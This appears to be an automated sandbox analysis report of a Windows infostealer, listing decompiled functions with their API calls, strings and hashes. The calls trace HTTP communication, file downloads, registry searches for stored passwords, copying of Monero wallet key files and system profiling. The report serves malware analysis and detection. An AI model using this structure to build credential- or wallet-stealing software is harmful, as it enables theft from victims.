Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
StrCmpCA.SHLWAPI(?,04070728), ref: 004045FA
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,04070738), ref: 00404AA8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
InternetCloseHandle.WININET(00000000), ref: 00404B6D
InternetCloseHandle.WININET(00000000), ref: 00404B85
HttpOpenRequestA.WININET(00000000,04070628,?,04078280,00000000,00000000,00400100,00000000), ref: 004047D5

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00404B8F

Strings

", xrefs: 004049F3
------, xrefs: 004047E8
J&f, xrefs: 004047A5
", xrefs: 004048B2
------, xrefs: 00404929
------, xrefs: 0040467D

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------$J&f
API String ID: 460715078-2398766951
Opcode ID: 7cda8d5521d99cf19aaaaf71ff52ec70d860003ad009979284783f799879de92
Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
Opcode Fuzzy Hash: 7cda8d5521d99cf19aaaaf71ff52ec70d860003ad009979284783f799879de92
Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00414AE0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 179
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

RegOpenKeyExA.KERNEL32(00000000,04073228,00000000,00020019,00000000,0041D289), ref: 00414B41
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Strings

- , xrefs: 00414D40
?, xrefs: 00414B17
%s\%s, xrefs: 00414BEA

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: f99f990ee98b2c87e49eb54a0476dff1419a0cb08dcebe01bba17a831a97a86a
Instruction ID: fbc8112ab3bfbfb2fdc98052a2813d45c496b4d84dbcb1503bfdf8522ef193f5
Opcode Fuzzy Hash: f99f990ee98b2c87e49eb54a0476dff1419a0cb08dcebe01bba17a831a97a86a
Instruction Fuzzy Hash: F1712A7590021C9BDB64DB60DD91FDA77B9BF88304F0086D9A109A6180DF74AFCACF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040F630 Relevance: 19.8, APIs: 13, Instructions: 298stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0040F667
strtok_s.MSVCRT ref: 0040FA8F

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0406DD00,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 3c0a368077967c4d6cb00d96c460f66b96e072591d38366c86bc8a63ce48f73f
Instruction ID: 2b3dd8003c7db60ae6f20250f168b485c10b0cdbdb2f80ad8031a0e3e82ebbeb
Opcode Fuzzy Hash: 3c0a368077967c4d6cb00d96c460f66b96e072591d38366c86bc8a63ce48f73f
Instruction Fuzzy Hash: B4C1A7B5900619DBCB24EF60DC89FDA7779AF58304F00459EE40DA7191DB34AAC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004012D0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004012E7

Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF

lstrcat.KERNEL32(?,00000000), ref: 0040130F
lstrlen.KERNEL32(?), ref: 0040131C
lstrcat.KERNEL32(?,.keys), ref: 00401337

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,040779F8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

DeleteFileA.KERNEL32(00000000), ref: 004014A9
memset.MSVCRT ref: 004014D0

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04070728), ref: 00404ED9

Strings

.keys, xrefs: 0040132B
\Monero\wallet.keys, xrefs: 0040134D
wallet_path, xrefs: 004012F0
SOFTWARE\monero-project\monero-core, xrefs: 004012F5

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$ChangeCopyCreateDeleteFindFreeInternetNotificationProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 2054947926-218353709
Opcode ID: 55317b6d737fdd9b0cce10d4996af803ea1c6e882ae9976ce4a7b1677b3be5f7
Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
Opcode Fuzzy Hash: 55317b6d737fdd9b0cce10d4996af803ea1c6e882ae9976ce4a7b1677b3be5f7
Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406FA0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406CA0: memset.MSVCRT ref: 00406CE4
Part of subcall function 00406CA0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
Part of subcall function 00406CA0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
Part of subcall function 00406CA0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
Part of subcall function 00406CA0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
Part of subcall function 00406CA0: HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29

lstrcat.KERNEL32(30A54020,0041DEB8), ref: 00406FD6
lstrcat.KERNEL32(30A54020,00000000), ref: 00407018
lstrcat.KERNEL32(30A54020, : ), ref: 0040702A
lstrcat.KERNEL32(30A54020,00000000), ref: 0040705F
lstrcat.KERNEL32(30A54020,0041DEC0), ref: 00407070
lstrcat.KERNEL32(30A54020,00000000), ref: 004070A3
lstrcat.KERNEL32(30A54020,0041DEC4), ref: 004070BD
task.LIBCPMTD ref: 004070CB

Strings

: , xrefs: 0040701E
`v@, xrefs: 00406FAF, 004070C8, 00406FFE, 00407034, 0040707C, 00407045, 00406FB2
h0A, xrefs: 00406FA6, 00406FA9

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: : $`v@$h0A
API String ID: 3191641157-3559972273
Opcode ID: 1bad08d2076e3e89f4364c8d83dbdbb36a614798d25560e064741be9e1e65df2
Instruction ID: d9fe8ddf8edd41d5d79e2c2aa3549d60ad86c8a123fe42dd1537da3b5299582f
Opcode Fuzzy Hash: 1bad08d2076e3e89f4364c8d83dbdbb36a614798d25560e064741be9e1e65df2
Instruction Fuzzy Hash: 4B318371E05504ABCB14EBA0DD99EFF7B75BF44305B104519F102BB290DA38BD46CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00415710 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

image/jpeg, xrefs: 00415836

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID:
String ID: image/jpeg
API String ID: 0-3785015651
Opcode ID: 404b0b46b206b3bf4871344594db70cb3467a452f73d0affe24fd8bd6f785462
Instruction ID: 4e1e11a2c406ea1305e74ab4ef0d66e5904d243d4ada77d8c1e4b1ca7303bf9d
Opcode Fuzzy Hash: 404b0b46b206b3bf4871344594db70cb3467a452f73d0affe24fd8bd6f785462
Instruction Fuzzy Hash: 30714CB5910608EBDB14EFE4EC85FEEB7B9BF48300F108509F515A7290DB38A945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00404C70 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
InternetCloseHandle.WININET(c.A), ref: 00404D75
InternetCloseHandle.WININET(?), ref: 00404D82

Strings

c.A, xrefs: 00404CC1, 00404DA0
c.A, xrefs: 00404D71, 00404CFD, 00404D00, 00404D74

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID: c.A$c.A
API String ID: 3066467675-270182787
Opcode ID: b883753fc3e69b7f41e944ae3663d1622002b5338cc9304bc8ff2cb9a4e93150
Instruction ID: 93472a029acc8278824907ab7d145ea178407da7df790c597300061c638fc298
Opcode Fuzzy Hash: b883753fc3e69b7f41e944ae3663d1622002b5338cc9304bc8ff2cb9a4e93150
Instruction Fuzzy Hash: 3731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081D9F709A7280DB746AC58F98

Uniqueness

Uniqueness Score: -1.00%

Function 00406CA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406CE4
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29

Part of subcall function 00408C20: vsprintf_s.MSVCRT ref: 00408C3B

task.LIBCPMTD ref: 00406F25

Strings

Password, xrefs: 00406DD1

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
Instruction ID: 212e66a44237aadac39c144ffd634e87161c2b2b5cb707631054264fe3c499ea
Opcode Fuzzy Hash: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
Instruction Fuzzy Hash: 4F613FB5D042589BDB24DB50CC45BDAB7B8BF44304F0081EAE64AA6281DF746FC9CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004141C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
HeapAlloc.KERNEL32(00000000), ref: 004142A7
wsprintfA.USER32 ref: 004142DD

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Strings

\, xrefs: 004141FD
C, xrefs: 004141E9
:, xrefs: 004141F9

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
Instruction ID: 52054a8b39965f6583c41ffabf349f0ba0ed2356e3a02770a6039194ee1378f4
Opcode Fuzzy Hash: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
Instruction Fuzzy Hash: BA3194B0D00258EBDF20DFA4DC45BEE77B4AF48304F104099F5496B281DB78AAD5CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004093A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
LocalAlloc.KERNEL32(00000040,?), ref: 00409411
ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
LocalFree.KERNEL32('@), ref: 00409470
FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Strings

'@, xrefs: 004093C3, 00409486
'@, xrefs: 00409426, 00409449, 00409429, 0040946F

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID: '@$'@
API String ID: 1815715184-345573653
Opcode ID: ade6bf95ff6b3192d7b4b22adc4c9fce4594f25298dc92e23d3df2276528e089
Instruction ID: e17ca2bf8fb39da35cf654cfb04ed30359ebe63801e33f8f777122e55a65d6c5
Opcode Fuzzy Hash: ade6bf95ff6b3192d7b4b22adc4c9fce4594f25298dc92e23d3df2276528e089
Instruction Fuzzy Hash: 0B31EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414960 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,04076828,00000000,?,0041D774,00000000,?,00000000,00000000,?,040768B8), ref: 0041496D
HeapAlloc.KERNEL32(00000000), ref: 00414974
GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
__aulldiv.LIBCMT ref: 004149AF
__aulldiv.LIBCMT ref: 004149BD
wsprintfA.USER32 ref: 004149E9

Strings

%d MB, xrefs: 004149E0
@, xrefs: 0041498A

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction ID: f510475f390b20142bb5ad9b480526056b42ea6839ab7368ec165d8bd78ed5c1
Opcode Fuzzy Hash: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction Fuzzy Hash: 84111EB0D40208ABDB10DFE4CC49FAE77B8BB48704F104549F715BB284D7B8A9418B99

Uniqueness

Uniqueness Score: -1.00%

Function 00405D40 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
StrCmpCA.SHLWAPI(?,04070728), ref: 00405DE7
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
FindCloseChangeNotification.KERNEL32(?,?,00000400), ref: 00405EE9
InternetCloseHandle.WININET(00410E73), ref: 00405EF3
InternetCloseHandle.WININET(00000000), ref: 00405F00

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Internet$CloseFile$HandleOpen$ChangeCrackCreateFindNotificationReadWritelstrcpylstrlen
String ID:
API String ID: 729276229-0
Opcode ID: 2c33a23298cca61dfdaeee40ce65a6995c68276a218cce1f1fd24f42d4950647
Instruction ID: 46018c2d0393d599e49b8942d3c4f4431f3cc1562104312217daf3d911a1fc92
Opcode Fuzzy Hash: 2c33a23298cca61dfdaeee40ce65a6995c68276a218cce1f1fd24f42d4950647
Instruction Fuzzy Hash: DB514471A00618ABDB20DF51CC45BEF7779EB44305F1081AAB645B71C0DB78AB85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00413D90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 00413D9E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

OpenProcess.KERNEL32(001FFFFF,00000000,00413FCD,0041D28B), ref: 00413DDC
memset.MSVCRT ref: 00413E2A
??_V@YAXPAX@Z.MSVCRT ref: 00413F7E

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00413E4C

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-4138519520
Opcode ID: bdd97628f29c753fecfde2c83a5401364cfafbcd459e9bc7d3d7e6f311fbbc6e
Instruction ID: ba4a912f34a6ab240f03399ec897c117189ceb9282cc0eaf369c81769a73d46f
Opcode Fuzzy Hash: bdd97628f29c753fecfde2c83a5401364cfafbcd459e9bc7d3d7e6f311fbbc6e
Instruction Fuzzy Hash: 35513DB0D003189BDB24EF51DC45BEEBB75AB48309F5041AEE11966281DB386BC9CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B250 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
